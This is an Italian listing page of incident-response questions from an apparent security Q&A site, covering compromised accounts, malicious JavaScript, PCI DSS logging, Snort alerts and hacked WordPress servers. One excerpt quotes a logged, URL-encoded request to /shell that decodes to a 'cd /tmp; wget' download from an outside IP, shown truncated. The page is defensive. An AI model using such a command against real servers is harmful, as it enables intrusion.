Domande con tag 'incident-response'

domande con tag
3
risposte

Account Gmail compromesso: per cosa è stato utilizzato?

Usiamo GMail per la nostra email aziendale, siamo una piccola azienda. Faccio l'amministrazione della posta per il nostro dominio e recentemente sono stato avvisato da una email di Google che l'account di un collega aveva alcuni accessi sospetti...
posta 13.10.2015 - 11:21
2
risposte

Trovato alcuni Javascript pericolosi - come è arrivato?

Trovato qualche javascript dannoso su un sito Joomla che abbiamo notato è tornato dopo essere stato cancellato una settimana fa. Inoltre notato che www.cssstickyfooter.com è infetto dallo stesso codice. Se sei curioso, eccolo qui sotto. fu...
posta 03.06.2011 - 05:29
2
risposte

Come soddisfare il requisito 10.6 di PCI DSS?

La società per cui lavoro sta richiedendo la conformità PCI e sono incaricata di scrivere la maggior parte delle procedure e delle politiche richieste. Il problema è che non ho alcuna esperienza con la sicurezza IT, quindi la maggior parte di ci...
posta 29.01.2013 - 14:29
1
risposta

Richiesta TFTP in uscita a 255.255.255.255

Recentemente snort mi ha comunicato che ho un computer dell'utente sulla mia rete che avvia una richiesta TFTP in uscita. La cosa strana è che la destinazione è 255.255.255.255 Qualcuno ha idea di cosa potrebbe essere? Payload registrati:...
posta 03.07.2012 - 17:15
1
risposta

Come può funzionare questo attacco?

Stavo navigando nei miei log di apache e ho trovato la seguente richiesta (che ha provocato un 404): 106.75.130.216 - - [DD/MMM/YYYY:hh:mm:ss] "GET /shell?%63%64%20%2F%74%6D%70%3B%77%67%65%74%20%68%74%74%70%3A%2F%2F%36%31%2E%31%36%30%2E%32%...
posta 26.03.2017 - 20:29
3
risposte

Quali sono i rischi di pubblicare il mio indirizzo email su pwnedlist.com?

pwnedlist.com afferma di avere dettagli di oltre 23 milioni di account che sono stati violati, e se invii il tuo indirizzo email appariranno se sei nel database. Le persone che gestiscono il sito sono affidabili, o potrebbero aggiungere il...
posta 27.07.2012 - 06:40
3
risposte

Ho bisogno di alcuni consigli per un buon addestramento pratico IR [chiuso]

Qualcuno sa se c'è una buona formazione pratica per la risposta agli incidenti e la scientifica digitale, o una certificazione che devo prendere per acquisire più esperienza pratica? Grazie e ogni informazione utile è apprezzata.     
posta 20.02.2016 - 01:51
2
risposte

Dominio dei rapporti sugli incidenti o sulla politica di notifica?

Sto scrivendo una politica aziendale su come i dipendenti devono gestire i report di eventi relativi alla sicurezza delle informazioni e notifiche provenienti da fornitori, clienti e persone all'interno della nostra organizzazione. per es....
posta 21.03.2013 - 17:19
1
risposta

Indicatori di compromesso

Solo per capire come funzionano gli indicatori di compromesso. Prendi Ad esempio, in questo articolo, lo strumento SMB. C'è un hash MD5 per questo. Quindi i miei firewall o ID dovrebbero essere in grado di rilevare questa stringa di hash MD5?...
posta 10.02.2015 - 14:13
2
risposte

Come eseguo un controllo di sicurezza sul mio server WordPress?

Ho un server basato su cloud in esecuzione con CentOS 6.0 e CSF installati. Oggi ho ricevuto un messaggio dal mio ospite che una delle mie installazioni WordPress è stata compromessa e utilizzata per il phishing. Ma non so come sia successo....
posta 10.08.2012 - 12:35